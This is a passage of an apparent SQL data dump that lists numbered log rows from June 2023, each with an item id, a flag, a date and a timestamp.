00:07:41'),(77538,4750,1,'2023-06-08','2023-06-08 00:07:47'),(77539,3752,1,'2023-06-08','2023-06-08 00:14:21'),(77540,4747,1,'2023-06-08','2023-06-08 00:20:32'),(77541,4747,1,'2023-06-08','2023-06-08 00:20:35'),(77542,89,1,'2023-06-08','2023-06-08 00:33:25'),(77543,89,1,'2023-06-08','2023-06-08 00:34:46'),(77544,3045,1,'2023-06-08','2023-06-08 00:41:16'),(77545,4930,1,'2023-06-08','2023-06-08 00:46:16'),(77546,4930,1,'2023-06-08','2023-06-08 00:46:23'),(77547,3045,1,'2023-06-08','2023-06-08 01:51:20'),(77548,4870,1,'2023-06-08','2023-06-08 03:04:47'),(77549,3764,1,'2023-06-08','2023-06-08 03:12:10'),(77550,76,1,'2023-06-08','2023-06-08 03:21:18'),(77551,470,1,'2023-06-08','2023-06-08 03:31:31'),(77552,4612,1,'2023-06-08','2023-06-08 03:49:46'),(77553,4966,1,'2023-06-08','2023-06-08 03:53:58'),(77554,4323,1,'2023-06-08','2023-06-08 04:11:57'),(77555,5289,1,'2023-06-08','2023-06-08 04:16:45'),(77556,4612,1,'2023-06-08','2023-06-08 04:29:43'),(77557,1582,1,'2023-06-08','2023-06-08 04:32:52'),(77558,1544,1,'2023-06-08','2023-06-08 04:34:46'),(77559,1588,1,'2023-06-08','2023-06-08 04:47:48'),(77560,2410,1,'2023-06-08','2023-06-08 05:05:36'),(77561,1602,1,'2023-06-08','2023-06-08 05:17:45'),(77562,3117,1,'2023-06-08','2023-06-08 05:30:44'),(77563,4792,1,'2023-06-08','2023-06-08 05:47:56'),(77564,3764,1,'2023-06-08','2023-06-08 05:56:31'),(77565,4792,1,'2023-06-08','2023-06-08 06:03:04'),(77566,1602,1,'2023-06-08','2023-06-08 06:21:35'),(77567,3752,1,'2023-06-08','2023-06-08 06:47:45'),(77568,4911,1,'2023-06-08','2023-06-08 07:01:59'),(77569,76,1,'2023-06-08','2023-06-08 07:05:26'),(77570,5359,1,'2023-06-08','2023-06-08 08:48:32'),(77571,5359,1,'2023-06-08','2023-06-08 08:49:49'),(77572,4587,1,'2023-06-08','2023-06-08 08:55:22'),(77573,1608,1,'2023-06-08','2023-06-08 09:03:03'),(77574,3102,1,'2023-06-08','2023-06-08 09:28:53'),(77575,89,1,'2023-06-08','2023-06-08 09:42:07'),(77576,1590,1,'2023-06-08','2023-06-08 09:42:22'),(77577,87,1,'2023-06-08','2023-06-08 10:16:49'),(77578,91,1,'2023-06-08','2023-06-08 10:17:08'),(77579,5248,1,'2023-06-08','2023-06-08 10:18:28'),(77580,5248,1,'2023-06-08','2023-06-08 10:18:28'),(77581,5320,1,'2023-06-08','2023-06-08 10:41:59'),(77582,487,1,'2023-06-08','2023-06-08 10:49:18'),(77583,473,1,'2023-06-08','2023-06-08 10:49:18'),(77584,2410,1,'2023-06-08','2023-06-08 10:59:01'),(77585,4960,1,'2023-06-08','2023-06-08 11:11:18'),(77586,4977,1,'2023-06-08','2023-06-08 11:23:12'),(77587,91,1,'2023-06-08','2023-06-08 11:50:41'),(77588,5276,1,'2023-06-08','2023-06-08 12:21:41'),(77589,487,1,'2023-06-08','2023-06-08 12:22:22'),(77590,1588,1,'2023-06-08','2023-06-08 12:30:52'),(77591,68,1,'2023-06-08','2023-06-08 12:49:27'),(77592,3034,1,'2023-06-08','2023-06-08 12:50:15'),(77593,91,1,'2023-06-08','2023-06-08 12:57:26'),(77594,4966,1,'2023-06-08','2023-06-08 13:06:53'),(77595,473,1,'2023-06-08','2023-06-08 13:12:48'),(77596,473,1,'2023-06-08','2023-06-08 13:14:51'),(77597,87,1,'2023-06-08','2023-06-08 13:17:11'),(77598,473,1,'2023-06-08','2023-06-08 13:17:55'),(77599,87,1,'2023-06-08','2023-06-08 13:17:59'),(77600,474,1,'2023-06-08','2023-06-08 13:18:02'),(77601,4930,1,'2023-06-08','2023-06-08 13:19:12'),(77602,2775,1,'2023-06-08','2023-06-08 13:19:48'),(77603,4966,1,'2023-06-08','2023-06-08 13:22:25'),(77604,1582,1,'2023-06-08','2023-06-08 13:29:58'),(77605,5163,1,'2023-06-08','2023-06-08 13:53:55'),(77606,80,1,'2023-06-08','2023-06-08 13:54:34'),(77607,5163,1,'2023-06-08','2023-06-08 13:54:47'),(77608,5163,1,'2023-06-08','2023-06-08 13:55:04'),(77609,5024,1,'2023-06-08','2023-06-08 14:11:40'),(77610,473,1,'2023-06-08','2023-06-08 14:28:33'),(77611,5122,1,'2023-06-08','2023-06-08 14:41:20'),(77612,4436,1,'2023-06-08','2023-06-08 14:51:14'),(77613,4911,1,'2023-06-08','2023-06-08 14:56:47'),(77614,68,1,'2023-06-08','2023-06-08 15:18:05'),(77615,91,1,'2023-06-08','2023-06-08 15:36:47'),(77616,5323,1,'2023-06-08','2023-06-08 15:40:44'),(77617,5323,1,'2023-06-08','2023-06-08 15:41:00'),(77618,1872,1,'2023-06-08','2023-06-08 15:44:51'),(77619,473,1,'2023-06-08','2023-06-08 15:44:52'),(77620,4301,1,'2023-06-08','2023-06-08 15:51:26'),(77621,2748,1,'2023-06-08','2023-06-08 16:17:56'),(77622,1582,1,'2023-06-08','2023-06-08 16:22:03'),(77623,76,1,'2023-06-08','2023-06-08 16:53:05'),(77624,76,1,'2023-06-08','2023-06-08 16:53:31'),(77625,1772,1,'2023-06-08','2023-06-08 16:54:23'),(77626,1713,1,'2023-06-08','2023-06-08 16:56:55'),(77627,4911,1,'2023-06-08','2023-06-08 17:20:45'),(77628,4436,1,'2023-06-08','2023-06-08 17:55:14'),(77629,2457,1,'2023-06-08','2023-06-08 18:05:37'),(77630,5276,1,'2023-06-08','2023-06-08 18:39:19'),(77631,4756,1,'2023-06-08','2023-06-08 18:50:06'),(77632,1872,1,'2023-06-08','2023-06-08 20:15:31'),(77633,473,1,'2023-06-08','2023-06-08 20:15:35'),(77634,4960,1,'2023-06-08','2023-06-08 20:16:39'),(77635,80,1,'2023-06-08','2023-06-08 20:17:16'),(77636,4960,1,'2023-06-08','2023-06-08 20:17:37'),(77637,4744,1,'2023-06-08','2023-06-08 20:40:26'),(77638,4911,1,'2023-06-08','2023-06-08 20:49:28'),(77639,5153,1,'2023-06-08','2023-06-08 20:53:38'),(77640,4911,1,'2023-06-08','2023-06-08 21:20:21'),(77641,1596,1,'2023-06-08','2023-06-08 21:36:17'),(77642,1713,1,'2023-06-08','2023-06-08 22:10:31'),(77643,4765,1,'2023-06-08','2023-06-08 23:00:01'),(77644,4911,1,'2023-06-09','2023-06-09 00:09:50'),(77645,4938,1,'2023-06-09','2023-06-09 00:32:23'),(77646,2558,1,'2023-06-09','2023-06-09 00:51:34'),(77647,2297,1,'2023-06-09','2023-06-09 01:07:15'),(77648,4591,1,'2023-06-09','2023-06-09 01:51:43'),(77649,1766,1,'2023-06-09','2023-06-09 01:59:26'),(77650,3034,1,'2023-06-09','2023-06-09 02:32:37'),(77651,3092,1,'2023-06-09','2023-06-09 02:47:01'),(77652,4348,1,'2023-06-09','2023-06-09 03:13:46'),(77653,468,1,'2023-06-09','2023-06-09 03:21:43'),(77654,4591,1,'2023-06-09','2023-06-09 03:38:04'),(77655,4436,1,'2023-06-09','2023-06-09 03:49:05'),(77656,2154,1,'2023-06-09','2023-06-09 04:09:01'),(77657,4792,1,'2023-06-09','2023-06-09 04:46:15'),(77658,4938,1,'2023-06-09','2023-06-09 05:03:17'),(77659,3259,1,'2023-06-09','2023-06-09 05:46:15'),(77660,1598,1,'2023-06-09','2023-06-09 05:57:06'),(77661,91,1,'2023-06-09','2023-06-09 06:16:32'),(77662,3259,1,'2023-06-09','2023-06-09 06:31:20'),(77663,468,1,'2023-06-09','2023-06-09 06:33:20'),(77664,4612,1,'2023-06-09','2023-06-09 06:49:06'),(77665,3297,1,'2023-06-09','2023-06-09 07:04:04'),(77666,1588,1,'2023-06-09','2023-06-09 07:08:31'),(77667,5071,1,'2023-06-09','2023-06-09 07:12:01'),(77668,3045,1,'2023-06-09','2023-06-09 07:19:32'),(77669,1588,1,'2023-06-09','2023-06-09 07:22:25'),(77670,4348,1,'2023-06-09','2023-06-09 08:10:10'),(77671,4561,1,'2023-06-09','2023-06-09 08:28:12'),(77672,3285,1,'2023-06-09','2023-06-09 08:50:17'),(77673,4911,1,'2023-06-09','2023-06-09 09:07:57'),(77674,4612,1,'2023-06-09','2023-06-09 09:38:48'),(77675,68,1,'2023-06-09','2023-06-09 09:49:25'),(77676,68,1,'2023-06-09','2023-06-09 09:51:25'),(77677,1600,1,'2023-06-09','2023-06-09 11:04:28'),(77678,4960,1,'2023-06-09','2023-06-09 11:15:30'),(77679,4960,1,'2023-06-09','2023-06-09 11:21:57'),(77680,80,1,'2023-06-09','2023-06-09 11:22:02'),(77681,1584,1,'2023-06-09','2023-06-09 11:32:47'),(77682,1582,1,'2023-06-09','2023-06-09 12:32:51'),(77683,4830,1,'2023-06-09','2023-06-09 13:39:07'),(77684,487,1,'2023-06-09','2023-06-09 13:46:51'),(77685,473,1,'2023-06-09','2023-06-09 13:46:51'),(77686,4960,1,'2023-06-09','2023-06-09 14:01:37'),(77687,80,1,'2023-06-09','2023-06-09 14:01:41'),(77688,4960,1,'2023-06-09','2023-06-09 14:02:59'),(77689,80,1,'2023-06-09','2023-06-09 14:03:44'),(77690,4960,1,'2023-06-09','2023-06-09 14:03:52'),(77691,4938,1,'2023-06-09','2023-06-09 14:16:51'),(77692,4771,1,'2023-06-09','2023-06-09 14:31:13'),(77693,89,1,'2023-06-09','2023-06-09 14:50:21'),(77694,4911,1,'2023-06-09','2023-06-09 14:54:34'),(77695,1614,1,'2023-06-09','2023-06-09 14:59:25'),(77696,4457,1,'2023-06-09','2023-06-09 15:15:32'),(77697,4830,1,'2023-06-09','2023-06-09 15:16:34'),(77698,5276,1,'2023-06-09','2023-06-09 15:29:43'),(77699,4582,1,'2023-06-09','2023-06-09 16:46:29'),(77700,4911,1,'2023-06-09','2023-06-09 17:04:27'),(77701,3313,1,'2023-06-09','2023-06-09 17:12:02'),(77702,1588,1,'2023-06-09','2023-06-09 18:20:09'),(77703,1722,1,'2023-06-09','2023-06-09 18:25:48'),(77704,1544,1,'2023-06-09','2023-06-09 18:27:49'),(77705,1614,1,'2023-06-09','2023-06-09 18:47:09'),(77706,1610,1,'2023-06-09','2023-06-09 19:29:16'),(77707,1614,1,'2023-06-09','2023-06-09 19:38:46'),(77708,4911,1,'2023-06-09','2023-06-09 19:39:52'),(77709,4911,1,'2023-06-09','2023-06-09 19:40:05'),(77710,4911,1,'2023-06-09','2023-06-09 19:48:37'),(77711,1728,1,'2023-06-09','2023-06-09 19:48:58'),(77712,80,1,'2023-06-09','2023-06-09 19:57:18'),(77713,4776,1,'2023-06-09','2023-06-09 20:12:55'),(77714,2911,1,'2023-06-09','2023-06-09 20:17:16'),(77715,1582,1,'2023-06-09','2023-06-09 20:39:27'),(77716,2159,1,'2023-06-09','2023-06-09 21:08:27'),(77717,3261,1,'2023-06-09','2023-06-09 21:22:05'),(77718,4911,1,'2023-06-09','2023-06-09 22:00:19'),(77719,4762,1,'2023-06-09','2023-06-09 22:20:35'),(77720,4420,1,'2023-06-09','2023-06-09 22:34:19'),(77721,5128,1,'2023-06-09','2023-06-09 23:46:30'),(77722,4733,1,'2023-06-10','2023-06-10 00:58:40'),(77723,4911,1,'2023-06-10','2023-06-10 02:28:35'),(77724,76,1,'2023-06-10','2023-06-10 02:31:50'),(77725,3282,1,'2023-06-10','2023-06-10 02:33:21'),(77726,76,1,'2023-06-10','2023-06-10 02:40:30'),(77727,4485,1,'2023-06-10','2023-06-10 02:51:06'),(77728,4797,1,'2023-06-10','2023-06-10 02:57:33'),(77729,1604,1,'2023-06-10','2023-06-10 03:13:24'),(77730,4416,1,'2023-06-10','2023-06-10 03:18:52'),(77731,4420,1,'2023-06-10','2023-06-10 03:43:31'),(77732,4657,1,'2023-06-10','2023-06-10 04:00:46'),(77733,5292,1,'2023-06-10','2023-06-10 04:14:30'),(77734,3764,1,'2023-06-10','2023-06-10 04:28:23'),(77735,4733,1,'2023-06-10','2023-06-10 04:59:28'),(77736,4573,1,'2023-06-10','2023-06-10 05:28:31'),(77737,3764,1,'2023-06-10','2023-06-10 05:35:05'),(77738,4573,1,'2023-06-10','2023-06-10 06:36:06'),(77739,1592,1,'2023-06-10','2023-06-10 06:39:59'),(77740,570,1,'2023-06-10','2023-06-10 07:25:16'),(77741,4960,1,'2023-06-10','2023-06-10 07:33:07'),(77742,2558,1,'2023-06-10','2023-06-10 08:10:03'),(77743,3664,1,'2023-06-10','2023-06-10 08:31:32'),(77744,3691,1,'2023-06-10','2023-06-10 08:59:07'),(77745,5280,1,'2023-06-10','2023-06-10 09:35:00'),(77746,76,1,'2023-06-10','2023-06-10 10:25:02'),(77747,473,1,'2023-06-10','2023-06-10 11:58:17'),(77748,474,1,'2023-06-10','2023-06-10 11:58:17'),(77749,1608,1,'2023-06-10','2023-06-10 12:38:36'),(77750,1608,1,'2023-06-10','2023-06-10 12:47:48'),(77751,4911,1,'2023-06-10','2023-06-10 13:00:29'),(77752,4911,1,'2023-06-10','2023-06-10 13:01:23'),(77753,5058,1,'2023-06-10','2023-06-10 13:13:08'),(77754,3275,1,'2023-06-10','2023-06-10 13:57:17'),(77755,1594,1,'2023-06-10','2023-06-10 14:27:30'),(77756,3275,1,'2023-06-10','2023-06-10 14:47:38'),(77757,1594,1,'2023-06-10','2023-06-10 15:29:38'),(77758,5080,1,'2023-06-10','2023-06-10 16:20:14'),(77759,4618,1,'2023-06-10','2023-06-10 16:47:17'),(77760,4657,1,'2023-06-10','2023-06-10 17:14:23'),(77761,1614,1,'2023-06-10','2023-06-10 17:37:12'),(77762,72,1,'2023-06-10','2023-06-10 18:21:27'),(77763,91,1,'2023-06-10','2023-06-10 19:24:33'),(77764,3541,1,'2023-06-10','2023-06-10 19:30:18'),(77765,91,1,'2023-06-10','2023-06-10 19:38:48'),(77766,3498,1,'2023-06-10','2023-06-10 19:39:15'),(77767,4440,1,'2023-06-10','2023-06-10 19:41:37'),(77768,91,1,'2023-06-10','2023-06-10 19:41:42'),(77769,91,1,'2023-06-10','2023-06-10 19:49:13'),(77770,4963,1,'2023-06-10','2023-06-10 20:47:22'),(77771,1588,1,'2023-06-10','2023-06-10 22:22:55'),(77772,4963,1,'2023-06-10','2023-06-10 22:25:07'),(77773,1594,1,'2023-06-10','2023-06-10 22:39:02'),(77774,1594,1,'2023-06-10','2023-06-10 22:54:07'),(77775,1608,1,'2023-06-11','2023-06-11 00:01:27'),(77776,5062,1,'2023-06-11','2023-06-11 00:16:32'),(77777,1586,1,'2023-06-11','2023-06-11 00:48:23'),(77778,1766,1,'2023-06-11','2023-06-11 02:12:51'),(77779,3482,1,'2023-06-11','2023-06-11 02:22:53'),(77780,5271,1,'2023-06-11','2023-06-11 02:22:53'),(77781,3742,1,'2023-06-11','2023-06-11 02:22:54'),(77782,3498,1,'2023-06-11','2023-06-11 02:22:55'),(77783,3104,1,'2023-06-11','2023-06-11 03:45:04'),(77784,5320,1,'2023-06-11','2023-06-11 03:46:37'),(77785,5323,1,'2023-06-11','2023-06-11 04:10:11'),(77786,1594,1,'2023-06-11','2023-06-11 04:17:20'),(77787,4744,1,'2023-06-11','2023-06-11 04:34:44'),(77788,4424,1,'2023-06-11','2023-06-11 04:48:21'),(77789,1582,1,'2023-06-11','2023-06-11 05:59:39'),(77790,4556,1,'2023-06-11','2023-06-11 07:02:58'),(77791,2751,1,'2023-06-11','2023-06-11 07:18:38'),(77792,1766,1,'2023-06-11','2023-06-11 08:23:24'),(77793,1588,1,'2023-06-11','2023-06-11 08:45:53'),(77794,1588,1,'2023-06-11','2023-06-11 08:45:56'),(77795,2809,1,'2023-06-11','2023-06-11 08:56:13'),(77796,91,1,'2023-06-11','2023-06-11 09:00:17'),(77797,5128,1,'2023-06-11','2023-06-11 09:07:28'),(77798,1594,1,'2023-06-11','2023-06-11 09:14:16'),(77799,1582,1,'2023-06-11','2023-06-11 09:15:10'),(77800,3267,1,'2023-06-11','2023-06-11 09:22:20'),(77801,2769,1,'2023-06-11','2023-06-11 09:37:29'),(77802,3030,1,'2023-06-11','2023-06-11 09:41:36'),(77803,1588,1,'2023-06-11','2023-06-11 09:46:14'),(77804,1588,1,'2023-06-11','2023-06-11 09:46:41'),(77805,1588,1,'2023-06-11','2023-06-11 09:47:17'),(77806,1588,1,'2023-06-11','2023-06-11 09:51:20'),(77807,1588,1,'2023-06-11','2023-06-11 10:04:54'),(77808,4960,1,'2023-06-11','2023-06-11 10:09:34'),(77809,4960,1,'2023-06-11','2023-06-11 10:29:25'),(77810,1582,1,'2023-06-11','2023-06-11 10:50:30'),(77811,5134,1,'2023-06-11','2023-06-11 11:03:48'),(77812,2769,1,'2023-06-11','2023-06-11 11:12:56'),(77813,1588,1,'2023-06-11','2023-06-11 12:04:04'),(77814,5314,1,'2023-06-11','2023-06-11 12:34:17'),(77815,2410,1,'2023-06-11','2023-06-11 13:52:54'),(77816,1612,1,'2023-06-11','2023-06-11 13:53:31'),(77817,4391,1,'2023-06-11','2023-06-11 13:54:59'),(77818,3541,1,'2023-06-11','2023-06-11 13:55:38'),(77819,2063,1,'2023-06-11','2023-06-11 13:56:19'),(77820,3104,1,'2023-06-11','2023-06-11 14:00:38'),(77821,1594,1,'2023-06-11','2023-06-11 14:01:19'),(77822,4756,1,'2023-06-11','2023-06-11 14:04:16'),(77823,4335,1,'2023-06-11','2023-06-11 14:04:52'),(77824,3117,1,'2023-06-11','2023-06-11 14:07:35'),(77825,4765,1,'2023-06-11','2023-06-11 14:09:30'),(77826,4744,1,'2023-06-11','2023-06-11 14:20:45'),(77827,4756,1,'2023-06-11','2023-06-11 14:26:18'),(77828,4582,1,'2023-06-11','2023-06-11 14:26:24'),(77829,2161,1,'2023-06-11','2023-06-11 14:29:02'),(77830,2457,1,'2023-06-11','2023-06-11 14:30:22'),(77831,1594,1,'2023-06-11','2023-06-11 14:33:24'),(77832,1612,1,'2023-06-11','2023-06-11 14:36:49'),(77833,2063,1,'2023-06-11','2023-06-11 14:38:42'),(77834,5323,1,'2023-06-11','2023-06-11 14:46:47'),(77835,1586,1,'2023-06-11','2023-06-11 14:49:42'),(77836,3691,1,'2023-06-11','2023-06-11 14:58:03'),(77837,5037,1,'2023-06-11','2023-06-11 15:10:47'),(77838,2420,1,'2023-06-11','2023-06-11 15:31:08'),(77839,4391,1,'2023-06-11','2023-06-11 15:39:20'),(77840,5314,1,'2023-06-11','2023-06-11 16:20:21'),(77841,1586,1,'2023-06-11','2023-06-11 16:46:32'),(77842,5062,1,'2023-06-11','2023-06-11 18:26:09'),(77843,4587,1,'2023-06-11','2023-06-11 18:28:46'),(77844,4911,1,'2023-06-11','2023-06-11 18:29:54'),(77845,4341,1,'2023-06-11','2023-06-11 19:22:16'),(77846,4492,1,'2023-06-11','2023-06-11 19:32:00'),(77847,1586,1,'2023-06-11','2023-06-11 19:44:48'),(77848,3541,1,'2023-06-11','2023-06-11 21:00:22'),(77849,1596,1,'2023-06-11','2023-06-11 21:08:23'),(77850,1610,1,'2023-06-11','2023-06-11 22:04:32'),(77851,3117,1,'2023-06-11','2023-06-11 23:53:15'),(77852,4529,1,'2023-06-12','2023-06-12 00:01:09'),(77853,1594,1,'2023-06-12','2023-06-12 00:18:19'),(77854,3691,1,'2023-06-12','2023-06-12 00:29:38'),(77855,2420,1,'2023-06-12','2023-06-12 00:56:46'),(77856,2769,1,'2023-06-12','2023-06-12 00:58:12'),(77857,1582,1,'2023-06-12','2023-06-12 01:38:33'),(77858,4582,1,'2023-06-12','2023-06-12 01:39:59'),(77859,1588,1,'2023-06-12','2023-06-12 01:47:51'),(77860,4960,1,'2023-06-12','2023-06-12 02:02:27'),(77861,4771,1,'2023-06-12','2023-06-12 02:20:32'),(77862,4765,1,'2023-06-12','2023-06-12 02:21:49'),(77863,1739,1,'2023-06-12','2023-06-12 02:41:19'),(77864,1697,1,'2023-06-12','2023-06-12 02:49:44'),(77865,4771,1,'2023-06-12','2023-06-12 02:52:26'),(77866,3724,1,'2023-06-12','2023-06-12 02:53:07'),(77867,4768,1,'2023-06-12','2023-06-12 02:54:31'),(77868,76,1,'2023-06-12','2023-06-12 02:54:35'),(77869,4335,1,'2023-06-12','2023-06-12 02:55:09'),(77870,1751,1,'2023-06-12','2023-06-12 02:56:54'),(77871,3675,1,'2023-06-12','2023-06-12 02:58:14'),(77872,3316,1,'2023-06-12','2023-06-12 02:58:43'),(77873,4744,1,'2023-06-12','2023-06-12 02:59:01'),(77874,3735,1,'2023-06-12','2023-06-12 03:00:35'),(77875,4238,1,'2023-06-12','2023-06-12 03:04:43'),(77876,4529,1,'2023-06-12','2023-06-12 03:07:43'),(77877,1720,1,'2023-06-12','2023-06-12 03:17:20'),(77878,3675,1,'2023-06-12','2023-06-12 03:24:38'),(77879,1697,1,'2023-06-12','2023-06-12 03:36:33'),(77880,4651,1,'2023-06-12','2023-06-12 03:41:28'),(77881,4529,1,'2023-06-12','2023-06-12 03:42:34'),(77882,3724,1,'2023-06-12','2023-06-12 03:54:34'),(77883,3316,1,'2023-06-12','2023-06-12 04:06:36'),(77884,3735,1,'2023-06-12','2023-06-12 04:18:36'),(77885,5134,1,'2023-06-12','2023-06-12 04:23:51'),(77886,4492,1,'2023-06-12','2023-06-12 04:24:33'),(77887,4651,1,'2023-06-12','2023-06-12 04:36:39'),(77888,1739,1,'2023-06-12','2023-06-12 04:42:34'),(77889,4238,1,'2023-06-12','2023-06-12 04:48:34'),(77890,4960,1,'2023-06-12','2023-06-12 05:01:46'),(77891,4335,1,'2023-06-12','2023-06-12 05:06:50'),(77892,4911,1,'2023-06-12','2023-06-12 05:08:58'),(77893,4645,1,'2023-06-12','2023-06-12 05:29:32'),(77894,3117,1,'2023-06-12','2023-06-12 05:42:56'),(77895,1582,1,'2023-06-12','2023-06-12 06:52:58'),(77896,4911,1,'2023-06-12','2023-06-12 06:57:17'),(77897,2617,1,'2023-06-12','2023-06-12 08:49:29'),(77898,3226,1,'2023-06-12','2023-06-12 09:30:26'),(77899,91,1,'2023-06-12','2023-06-12 11:02:13'),(77900,4966,1,'2023-06-12','2023-06-12 11:35:29'),(77901,4911,1,'2023-06-12','2023-06-12 11:46:28'),(77902,5163,1,'2023-06-12','2023-06-12 11:46:31'),(77903,3117,1,'2023-06-12','2023-06-12 12:17:23'),(77904,1594,1,'2023-06-12','2023-06-12 12:22:12'),(77905,3706,1,'2023-06-12','2023-06-12 12:40:26'),(77906,4556,1,'2023-06-12','2023-06-12 13:16:42'),(77907,4492,1,'2023-06-12','2023-06-12 13:53:32'),(77908,1722,1,'2023-06-12','2023-06-12 13:57:00'),(77909,4332,1,'2023-06-12','2023-06-12 14:08:31'),(77910,2617,1,'2023-06-12','2023-06-12 14:15:57'),(77911,4966,1,'2023-06-12','2023-06-12 14:48:33'),(77912,4485,1,'2023-06-12','2023-06-12 15:25:19'),(77913,4963,1,'2023-06-12','2023-06-12 15:30:42'),(77914,1604,1,'2023-06-12','2023-06-12 15:31:13'),(77915,80,1,'2023-06-12','2023-06-12 15:31:47'),(77916,1724,1,'2023-06-12','2023-06-12 15:45:28'),(77917,4963,1,'2023-06-12','2023-06-12 16:00:08'),(77918,4911,1,'2023-06-12','2023-06-12 16:00:13'),(77919,4960,1,'2023-06-12','2023-06-12 16:17:01'),(77920,4977,1,'2023-06-12','2023-06-12 16:45:52'),(77921,4960,1,'2023-06-12','2023-06-12 17:01:33'),(77922,4911,1,'2023-06-12','2023-06-12 18:28:06'),(77923,1588,1,'2023-06-12','2023-06-12 19:01:48'),(77924,2964,1,'2023-06-12','2023-06-12 19:38:45'),(77925,1596,1,'2023-06-12','2023-06-12 20:04:45'),(77926,2964,1,'2023-06-12','2023-06-12 20:08:08'),(77927,91,1,'2023-06-12','2023-06-12 20:15:27'),(77928,4335,1,'2023-06-12','2023-06-12 20:19:23'),(77929,4645,1,'2023-06-12','2023-06-12 20:40:38'),(77930,1588,1,'2023-06-12','2023-06-12 21:10:38'),(77931,4448,1,'2023-06-12','2023-06-12 21:42:36'),(77932,4691,1,'2023-06-12','2023-06-12 22:36:57'),(77933,2813,1,'2023-06-12','2023-06-12 22:43:50'),(77934,84,1,'2023-06-12','2023-06-12 22:46:03'),(77935,3691,1,'2023-06-12','2023-06-12 23:24:20'),(77936,1608,1,'2023-06-12','2023-06-12 23:27:12'),(77937,4238,1,'2023-06-12','2023-06-12 23:49:29'),(77938,3482,1,'2023-06-13','2023-06-13 01:45:44'),(77939,1743,1,'2023-06-13','2023-06-13 02:10:44'),(77940,4950,1,'2023-06-13','2023-06-13 02:15:46'),(77941,4911,1,'2023-06-13','2023-06-13 02:30:08'),(77942,1544,1,'2023-06-13','2023-06-13 02:41:50'),(77943,2801,1,'2023-06-13','2023-06-13 03:09:28'),(77944,4911,1,'2023-06-13','2023-06-13 03:16:53'),(77945,84,1,'2023-06-13','2023-06-13 03:20:46'),(77946,2801,1,'2023-06-13','2023-06-13 05:41:10'),(77947,4911,1,'2023-06-13','2023-06-13 06:13:10'),(77948,1606,1,'2023-06-13','2023-06-13 06:18:15'),(77949,4301,1,'2023-06-13','2023-06-13 07:32:31'),(77950,1602,1,'2023-06-13','2023-06-13 07:44:39'),(77951,68,1,'2023-06-13','2023-06-13 08:44:58'),(77952,68,1,'2023-06-13','2023-06-13 08:46:33'),(77953,3721,1,'2023-06-13','2023-06-13 09:00:48'),(77954,4911,1,'2023-06-13','2023-06-13 09:17:07'),(77955,473,1,'2023-06-13','2023-06-13 09:33:02'),(77956,1870,1,'2023-06-13','2023-06-13 09:37:08'),(77957,473,1,'2023-06-13','2023-06-13 09:37:08'),(77958,4938,1,'2023-06-13','2023-06-13 09:38:47'),(77959,91,1,'2023-06-13','2023-06-13 09:38:53'),(77960,1586,1,'2023-06-13','2023-06-13 10:25:51'),(77961,1614,1,'2023-06-13','2023-06-13 11:26:43'),(77962,4457,1,'2023-06-13','2023-06-13 11:27:07'),(77963,89,1,'2023-06-13','2023-06-13 11:30:16'),(77964,89,1,'2023-06-13','2023-06-13 11:31:03'),(77965,4301,1,'2023-06-13','2023-06-13 11:33:39'),(77966,5131,1,'2023-06-13','2023-06-13 11:33:48'),(77967,2503,1,'2023-06-13','2023-06-13 11:34:50'),(77968,1604,1,'2023-06-13','2023-06-13 11:43:26'),(77969,4911,1,'2023-06-13','2023-06-13 11:49:19'),(77970,87,1,'2023-06-13','2023-06-13 11:53:25'),(77971,486,1,'2023-06-13','2023-06-13 11:53:47'),(77972,87,1,'2023-06-13','2023-06-13 11:53:58'),(77973,1604,1,'2023-06-13','2023-06-13 11:54:05'),(77974,4677,1,'2023-06-13','2023-06-13 12:57:05'),(77975,2419,1,'2023-06-13','2023-06-13 13:21:43'),(77976,4911,1,'2023-06-13','2023-06-13 13:22:56'),(77977,1594,1,'2023-06-13','2023-06-13 13:32:32'),(77978,1588,1,'2023-06-13','2023-06-13 13:36:19'),(77979,4729,1,'2023-06-13','2023-06-13 13:40:23'),(77980,1586,1,'2023-06-13','2023-06-13 13:49:31'),(77981,68,1,'2023-06-13','2023-06-13 14:00:47'),(77982,1586,1,'2023-06-13','2023-06-13 14:02:38'),(77983,1586,1,'2023-06-13','2023-06-13 14:11:38'),(77984,1586,1,'2023-06-13','2023-06-13 14:12:19'),(77985,5253,1,'2023-06-13','2023-06-13 14:34:07'),(77986,5062,1,'2023-06-13','2023-06-13 14:35:37'),(77987,91,1,'2023-06-13','2023-06-13 14:54:23'),(77988,1586,1,'2023-06-13','2023-06-13 15:00:39'),(77989,80,1,'2023-06-13','2023-06-13 15:01:10'),(77990,1586,1,'2023-06-13','2023-06-13 15:05:01'),(77991,4944,1,'2023-06-13','2023-06-13 15:30:39'),(77992,4944,1,'2023-06-13','2023-06-13 15:31:18'),(77993,1608,1,'2023-06-13','2023-06-13 17:54:01'),(77994,2704,1,'2023-06-13','2023-06-13 19:54:34'),(77995,2704,1,'2023-06-13','2023-06-13 19:55:04'),(77996,4963,1,'2023-06-13','2023-06-13 20:11:35'),(77997,2617,1,'2023-06-13','2023-06-13 20:43:30'),(77998,1610,1,'2023-06-13','2023-06-13 21:20:24'),(77999,1586,1,'2023-06-13','2023-06-13 22:18:46'),(78000,1586,1,'2023-06-13','2023-06-13 22:18:46'),(78001,1586,1,'2023-06-13','2023-06-13 22:19:11'),(78002,4436,1,'2023-06-13','2023-06-13 22:46:12'),(78003,1588,1,'2023-06-13','2023-06-13 23:12:55'),(78004,76,1,'2023-06-13','2023-06-13 23:37:39'),(78005,3664,1,'2023-06-13','2023-06-13 23:45:01'),(78006,3107,1,'2023-06-13','2023-06-13 23:45:07'),(78007,5163,1,'2023-06-13','2023-06-13 23:53:21'),(78008,5163,1,'2023-06-14','2023-06-14 00:11:07'),(78009,68,1,'2023-06-14','2023-06-14 00:11:28'),(78010,80,1,'2023-06-14','2023-06-14 00:12:09'),(78011,68,1,'2023-06-14','2023-06-14 00:12:16'),(78012,5163,1,'2023-06-14','2023-06-14 00:12:28'),(78013,1598,1,'2023-06-14','2023-06-14 00:45:51'),(78014,3664,1,'2023-06-14','2023-06-14 00:48:53'),(78015,4377,1,'2023-06-14','2023-06-14 01:22:52'),(78016,3479,1,'2023-06-14','2023-06-14 02:18:14'),(78017,2248,1,'2023-06-14','2023-06-14 02:18:53'),(78018,4960,1,'2023-06-14','2023-06-14 02:36:58'),(78019,4520,1,'2023-06-14','2023-06-14 02:39:54'),(78020,3051,1,'2023-06-14','2023-06-14 02:44:27'),(78021,3051,1,'2023-06-14','2023-06-14 04:14:20'),(78022,80,1,'2023-06-14','2023-06-14 04:48:15'),(78023,4756,1,'2023-06-14','2023-06-14 